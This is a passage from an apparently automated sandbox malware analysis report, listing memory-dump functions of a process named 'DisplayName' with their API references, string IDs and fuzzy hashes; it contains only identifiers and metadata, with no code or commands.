                                      • Opcode Fuzzy Hash: 96c05bf23931d1dedfe42bae814f15b1c4e07265224cb0ae97837052933707e2
                                      • Instruction Fuzzy Hash: 5951D170A06218CFDB54DF68D899BADBBF2FB49310F1081A9A909EB354DB305D84CF51
                                      Function 058380AB Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 05bba2042e57876fd53b84fb8b132cdec00f090e6d229aaa4002d80d8a87566d
                                      • Instruction ID: 8909783f601fe9f66331da13910f05e0be87fe58989d4dd4ad836a49c7c1624a
                                      • Opcode Fuzzy Hash: 05bba2042e57876fd53b84fb8b132cdec00f090e6d229aaa4002d80d8a87566d
                                      • Instruction Fuzzy Hash: AF4191B0911248CFDB54DF99D489BADBBF2FB4A304F208065E819EB258DB749D85CF44
                                      Function 05621A59 Relevance: 1.3, APIs: 1, Instructions: 97memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05621AFF
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2789679085.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5620000_DisplayName.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 14f0314455c678df30a889b33340d7d9173c5ab98389f6dad64b130ebe791aec
                                      • Instruction ID: ec099d8019a7d38f52a0657998676d42c385110c91b32d6296efb90e88adce87
                                      • Opcode Fuzzy Hash: 14f0314455c678df30a889b33340d7d9173c5ab98389f6dad64b130ebe791aec
                                      • Instruction Fuzzy Hash: 6531A7B4D052589FCF14CFA9D880ADEFBB5AF59310F10942AE824B7310D739A945CFA4
                                      Function 057F088D Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 54620b816b8a6d3163412e7c52fa83910abe3475dd650e4d6f74f2548ad7d754
                                      • Instruction ID: 21b7d962615c581dcaf6300a0ec4e0b1e9a305060958e38ebaf8fae5532a89bc
                                      • Opcode Fuzzy Hash: 54620b816b8a6d3163412e7c52fa83910abe3475dd650e4d6f74f2548ad7d754
                                      • Instruction Fuzzy Hash: C141F470905258CFDB50DF99D84CBADB7F6FB8A300F1090A6D50AAB31ADBB05985DF01
                                      Function 05621A60 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05621AFF
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2789679085.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5620000_DisplayName.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 5cf68d678a5fae1b4687ae438fb3893c5e71c33c343f9901e470884835fe940c
                                      • Instruction ID: b0159547c1804c797bba5523402aeb587eab687300bca2561285bc8aac96d4ab
                                      • Opcode Fuzzy Hash: 5cf68d678a5fae1b4687ae438fb3893c5e71c33c343f9901e470884835fe940c
                                      • Instruction Fuzzy Hash: 333196B8D052589FCF14CFA9D880A9EFBB1AF99310F10942AE824B7210D735A945CFA4
                                      Function 057F0E51 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: f71d3ef91b7a0bba9e2a6a719e3d241f09aa13ae78109b711e9b338cd68de3ae
                                      • Instruction ID: 2477fc747637c9287437452cbbb610ffd0a677b72de44666ecf05a766e1a3369
                                      • Opcode Fuzzy Hash: f71d3ef91b7a0bba9e2a6a719e3d241f09aa13ae78109b711e9b338cd68de3ae
                                      • Instruction Fuzzy Hash: 443125B0E00208CFDB04EFA9D4886AEBBF6FB99304F108166E516B7345DB345A45CF51
                                      Function 05837F32 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 007491b48b2f7c268476322563e314b24a03e7654ea57f35117e25ef7b0f0e80
                                      • Instruction ID: a11a239315e3fddbc9ef8559d86475a94c81730dbf4d19ad46c50f107b1e0d34
                                      • Opcode Fuzzy Hash: 007491b48b2f7c268476322563e314b24a03e7654ea57f35117e25ef7b0f0e80
                                      • Instruction Fuzzy Hash: 3841A1B0D05248CFDB54DF99D0897ADBBF2FB4A304F209066E819EB258DB749985CF44
                                      Function 057F0E60 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: b082917ce4c350e34bfabb8b1fd48786a0492782929b589725be6d01b17dca43
                                      • Instruction ID: 6c2658468ae13fc19642bbc1d117e77170ed5cdff6a220c1fcfe88a202abbb4f
                                      • Opcode Fuzzy Hash: b082917ce4c350e34bfabb8b1fd48786a0492782929b589725be6d01b17dca43
                                      • Instruction Fuzzy Hash: 91311470E04208CFDB04EFA9D4886AEBBF6FB99304F108166E516B7345DB346A45CF91
                                      Function 05838400 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: b38943fa1d049cae32f82350b5e2e6cd390dd64b8b2d2940e9d9104ac516e78c
                                      • Instruction ID: e0f70d54d00c8d313525af7b571e72745b9e1388516269a96d76730fc7b04f58
                                      • Opcode Fuzzy Hash: b38943fa1d049cae32f82350b5e2e6cd390dd64b8b2d2940e9d9104ac516e78c
                                      • Instruction Fuzzy Hash: A421B870D04209CFCB04DFA8C8466AEBBF6FB8A304F108469E515E7788CB385A45CF92
                                      Function 05838410 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: e7acae9359d34c0cac415166cb977626b9eda56a75f74e035226f3451c72b71f
                                      • Instruction ID: a4ab025315fe303dfefdd41d605e5763eeb8cbfcf224d965636a2766183e0894
                                      • Opcode Fuzzy Hash: e7acae9359d34c0cac415166cb977626b9eda56a75f74e035226f3451c72b71f
                                      • Instruction Fuzzy Hash: A1218770E04209CFDB04DFA9C8456AEBBF6FB8A304F108069E915E7788CB345A45CF92
                                      Function 00991E0A Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772830333.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_990000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: cabf904127eb62489db3358954fdd77624ee2c7542e614d44ee35eed06c4f0f3
                                      • Instruction ID: d0036c51dd16b026732648ce3c6cf0e907ea16789ea9d0de7683e57551e79cc4
                                      • Opcode Fuzzy Hash: cabf904127eb62489db3358954fdd77624ee2c7542e614d44ee35eed06c4f0f3
                                      • Instruction Fuzzy Hash: E721F57090420ADFDF44DFACC8887ADBBF5FB49304F2086AAD419A7251D7784A84DB05
                                      Function 00991E18 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772830333.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_990000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 2528af1ae2fa3a45ecdd3481b89c2daae826f51c8e05b786fce37ada2de0b816
                                      • Instruction ID: 6e3a5818a4aa1166c85cd06d67ce166e091101b51448238bfbb684611be5a6e2
                                      • Opcode Fuzzy Hash: 2528af1ae2fa3a45ecdd3481b89c2daae826f51c8e05b786fce37ada2de0b816
                                      • Instruction Fuzzy Hash: 3F21F77090420ADFDF44EFADC4487ADBBF5FB4A305F2086AAD819A3251D7784A84DF16
                                      Function 05837F99 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 1d62166207e867d6774dcad12880a6bff62ecbc99558f7cd1b01ec7ad985f3ba
                                      • Instruction ID: 001ac438c5145ee48981a12743e3db15288d042f39df9a0739785257589cbd7c
                                      • Opcode Fuzzy Hash: 1d62166207e867d6774dcad12880a6bff62ecbc99558f7cd1b01ec7ad985f3ba
                                      • Instruction Fuzzy Hash: BF21EAB0D05288CFDB05EFA8D48979CBBF2FB55304F208066E805EB258D7749D89CB44
                                      Function 057F0040 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: ccdaf624dc71c6a6f64121c1ddb8b14b3f6fed846f4712f95e4487d926fbdce5
                                      • Instruction ID: 4f0f84b0a639afcd49199481cbe85334e6ad3bf45b3e1964a3f319f6f621679d
                                      • Opcode Fuzzy Hash: ccdaf624dc71c6a6f64121c1ddb8b14b3f6fed846f4712f95e4487d926fbdce5
                                      • Instruction Fuzzy Hash: FD210730A08208CFDB54DF69D8887EDBBF6FB4A310F5081A9E54AA7356DB705985CF05
                                      Function 057F00E5 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: f15ea7e673a8bb73fe453844be95095d3a6bd144103b0e1160330ba7c3b17551
                                      • Instruction ID: e3704160a10ef2543a7e29813f416bf2f4ef74e93255d3a2aa0223f6bfb76da4
                                      • Opcode Fuzzy Hash: f15ea7e673a8bb73fe453844be95095d3a6bd144103b0e1160330ba7c3b17551
                                      • Instruction Fuzzy Hash: A421E374A01218CFEB54DF68D849BACBBF1FB59301F1041AAE509A7345CB745A84CF11
                                      Function 00996EF1 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772830333.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_990000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8
                                      • API String ID: 0-4194326291
                                      • Opcode ID: 673aa7571b36908c4a21a5da81805aef19176b8fbd8e5de601f162be8f2c86af
                                      • Instruction ID: 01e431fdc2fe0fdce4463b16513f61123f48137d37834d98b7e9ff720eea828f
                                      • Opcode Fuzzy Hash: 673aa7571b36908c4a21a5da81805aef19176b8fbd8e5de601f162be8f2c86af
                                      • Instruction Fuzzy Hash: 3911E5B480422ADFDF60CF58D848BD8B7B8BB49300F1041EADA19B3690DB745AC5CF55
                                      Function 057F03C0 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 87e7023a927228d87488e22127e753c3823f6e2cc3e70cf03de1c3e133a8e456
                                      • Instruction ID: f8b96cedcabd5aa2879778ba6bd39bd6e863a00b079264c0083f1d96bc18541f
                                      • Opcode Fuzzy Hash: 87e7023a927228d87488e22127e753c3823f6e2cc3e70cf03de1c3e133a8e456
                                      • Instruction Fuzzy Hash: A6010830A002088BDB55DB69E4996ACBBF1FB49310F1081A6E509E7356DB345E85CF05
                                      Function 05B07D94 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2791083524.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5b00000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 57b3ce5c8ab7f9e2d50ace904547f3484adb01b3750854a8066471cbf7aa925d
                                      • Instruction ID: f2508d70e176f96a115d496d011e9e685eb5a45ff9093d86862db1a7b7051129
                                      • Opcode Fuzzy Hash: 57b3ce5c8ab7f9e2d50ace904547f3484adb01b3750854a8066471cbf7aa925d
                                      • Instruction Fuzzy Hash: F7014874A00118CFDB54EF68C8999E9BBBAFB99300F1041E6A509E7344CF346E81CF15
                                      Function 05835593 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 3c10db29a9076ebe47c308d235639889bf8c4471d5c9774a2b1ab72f1d0677d9
                                      • Instruction ID: 0da72adc1d95af594338c5862ffe950cc924e07a82a034855a1f8e17d81b90a3
                                      • Opcode Fuzzy Hash: 3c10db29a9076ebe47c308d235639889bf8c4471d5c9774a2b1ab72f1d0677d9
                                      • Instruction Fuzzy Hash: 9A011970909258CFCB15CF69D4497A8BBF2FB4A304F2485E6D499E6256DB344EC8CF40
                                      Function 057F01D2 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: db172f5c192caf70cbb76d2bd316d3c284d28f6824811a0df5eeaed9fedbb47f
                                      • Instruction ID: 917b51a8ea3bf1bca97b21200a38d21c891ec6366b8449a73b5acdcebbb79a96
                                      • Opcode Fuzzy Hash: db172f5c192caf70cbb76d2bd316d3c284d28f6824811a0df5eeaed9fedbb47f
                                      • Instruction Fuzzy Hash: E501D674A002588FDB94EF68C8497DDBBB1FB59300F1081E6A60AB7348DB305E858F91
                                      Function 057F05E8 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 4610c1d6bbcd793f9cc19e522761f17ea584b42b9a82a6c58358c925bbc7c1a3
                                      • Instruction ID: 06e298776be4eca167b6002a60ca563e18cb9f6872c010364b11af5854cdeb99
                                      • Opcode Fuzzy Hash: 4610c1d6bbcd793f9cc19e522761f17ea584b42b9a82a6c58358c925bbc7c1a3
                                      • Instruction Fuzzy Hash: 4001C434A11258CFDB54DF68D889BADBBB2FB49305F2041A5E10AA7356DB305985CF05
                                      Function 057F0540 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 384124c89aabdb34335dfc9c9d2cebd8b428bf692602c001e0c1c4a6ec6e80cd
                                      • Instruction ID: 76500baea8bb64116fa864e3031128e2b8e9329f2b8836ff234630ac758590ec
                                      • Opcode Fuzzy Hash: 384124c89aabdb34335dfc9c9d2cebd8b428bf692602c001e0c1c4a6ec6e80cd
                                      • Instruction Fuzzy Hash: 5401B234A01208DFCB54DF68D489BACBBF1FB46304F1080A6E44AA7356DB749D89CF45
                                      Function 057F02FF Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: bbdf2d7fe6db0c1592c394eb4eb579dd48931e783799ccf1c8120ed4c8fa4f00
                                      • Instruction ID: 6125d38ca41fcf3835f0c717d08cf57fdfbb9ae892bc737831a7e1ce84a7efae
                                      • Opcode Fuzzy Hash: bbdf2d7fe6db0c1592c394eb4eb579dd48931e783799ccf1c8120ed4c8fa4f00
                                      • Instruction Fuzzy Hash: 2601B234A04218CFCB50DF68D4997A8BBB1FB15314F6040A5E08AA7752DB7059C5CF05
                                      Function 057F0BDF Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 947650790b3285d03a4c8551439f853a58c5416270072793bd77b8e3f72018fd
                                      • Instruction ID: f00abd5a914dba9112025d3683a6be6987ec5388444c448afd163ff146d08e89
                                      • Opcode Fuzzy Hash: 947650790b3285d03a4c8551439f853a58c5416270072793bd77b8e3f72018fd
                                      • Instruction Fuzzy Hash: 2BF0C474A00118CFDB50DF28D589BADBBF1FB19310F5081A9E54AA7342DB715E84DF11
                                      Function 05834CF9 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 49cdb7883fd9aaca9c208455df9f3088c4e3e4f60d472ac618a0135cf632b126
                                      • Instruction ID: 0452b73b5c634468662543910a72cbf8ed5d8b01c785b619bcf4b1b2787dee30
                                      • Opcode Fuzzy Hash: 49cdb7883fd9aaca9c208455df9f3088c4e3e4f60d472ac618a0135cf632b126
                                      • Instruction Fuzzy Hash: 00F01770905218CFCB24CF29D449798BBF2FB4A304F1082E6E499E6255DB304E84CF00
                                      Function 057F208C Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 53e2783bb1933165f363c2a690b03f3f5b46ad7993e5086c897408e19d0c49fa
                                      • Instruction ID: 929dce757d93bfcf662a8fc87b99dcc6e3c72fa821c829b63d70e9ba5d13e830
                                      • Opcode Fuzzy Hash: 53e2783bb1933165f363c2a690b03f3f5b46ad7993e5086c897408e19d0c49fa
                                      • Instruction Fuzzy Hash: ACF0D474901248CFDB14DF58C988AACBBF2FB99300F6581A9E109E7355DB305A81DB04
                                      Function 0571211B Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: [
                                      • API String ID: 0-784033777
                                      • Opcode ID: 52778cf5b40aa2fa17e542d64519962712a924dc8b4493ab309db43e78631a52
                                      • Instruction ID: f21cd078eb6cf70962d8f70634ec0e1277f224fb5f0df0cf0d5b1a3dbf340a02
                                      • Opcode Fuzzy Hash: 52778cf5b40aa2fa17e542d64519962712a924dc8b4493ab309db43e78631a52
                                      • Instruction Fuzzy Hash: 9BF0AF74A006289FCB55EF64DC44ADEBBB1FB59300F5081EAD909A7254DF342E84EF44
                                      Function 05B02008 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2791083524.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5b00000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: b595c22f967cc1fb23553d9f4fff06e61551d427a56a24bb051a920e3c784b27
                                      • Instruction ID: 32a06e2283e1ee2310475ce6dc62d3b4e64ea1fcfc67e6f70ce4f023e23c7f38
                                      • Opcode Fuzzy Hash: b595c22f967cc1fb23553d9f4fff06e61551d427a56a24bb051a920e3c784b27
                                      • Instruction Fuzzy Hash: D6F05E70910119CFDBA4DF64C849BA87BB1FB49310F5154E6E01DA3680CA746EC48F15
                                      Function 057F070B Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 368e45263bb5038390b522a82c91539e0a92cd1f365f740cb6b8146e3ee7d91e
                                      • Instruction ID: a504879cd9c37af95e22cc0ceb482097bb460e21b8ee141ab4b9f696641da93e
                                      • Opcode Fuzzy Hash: 368e45263bb5038390b522a82c91539e0a92cd1f365f740cb6b8146e3ee7d91e
                                      • Instruction Fuzzy Hash: B8F0F874A0624C8FCB51DF24D8A97A9BBB1FB47300F1041E6A049AB751DA345A44CF46
                                      Function 057F065D Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 62f07abe503ec4ecfc8dc2759eca6574ae05899dc2aceef4f6a5b096a83c8575
                                      • Instruction ID: e97ff9225f1b48df6fa99f6f57f750897c47e0adf6dfc0ec55d5b00bb223ff65
                                      • Opcode Fuzzy Hash: 62f07abe503ec4ecfc8dc2759eca6574ae05899dc2aceef4f6a5b096a83c8575
                                      • Instruction Fuzzy Hash: 6BF0F834A4121A8FDB65DF68D9587ADBBB2FB59300F1040AAA61AB7748DB301E848F01
                                      Function 057F0AA0 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 3f12f1f9d5a889356ab92783c5cd65203d9030cc9336c41b031f736aa0bb687a
                                      • Instruction ID: 870be8b20c7a7b6405c43b7ba43b8960977b5f2bf00a18433af3ac60f9d357be
                                      • Opcode Fuzzy Hash: 3f12f1f9d5a889356ab92783c5cd65203d9030cc9336c41b031f736aa0bb687a
                                      • Instruction Fuzzy Hash: 70F0B274A00218CBDB65DF68D885BA9BAB2FB59310F2041E99509A3345DA301EC4CF10
                                      Function 057F0444 Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: d328f3da37e957a6118212d68adccc37702da5c808eab534a0dd5e8591d813ee
                                      • Instruction ID: f42010f562d4bd8b54c1f1151239a9d19e372acfa7e87e7aba26b5b2a304bea8
                                      • Opcode Fuzzy Hash: d328f3da37e957a6118212d68adccc37702da5c808eab534a0dd5e8591d813ee
                                      • Instruction Fuzzy Hash: 3BE01A34610244DFDB04DF68E08C7AD7BF2FB05314F504065E102A7346CB749889CF05
                                      Function 057F09F1 Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
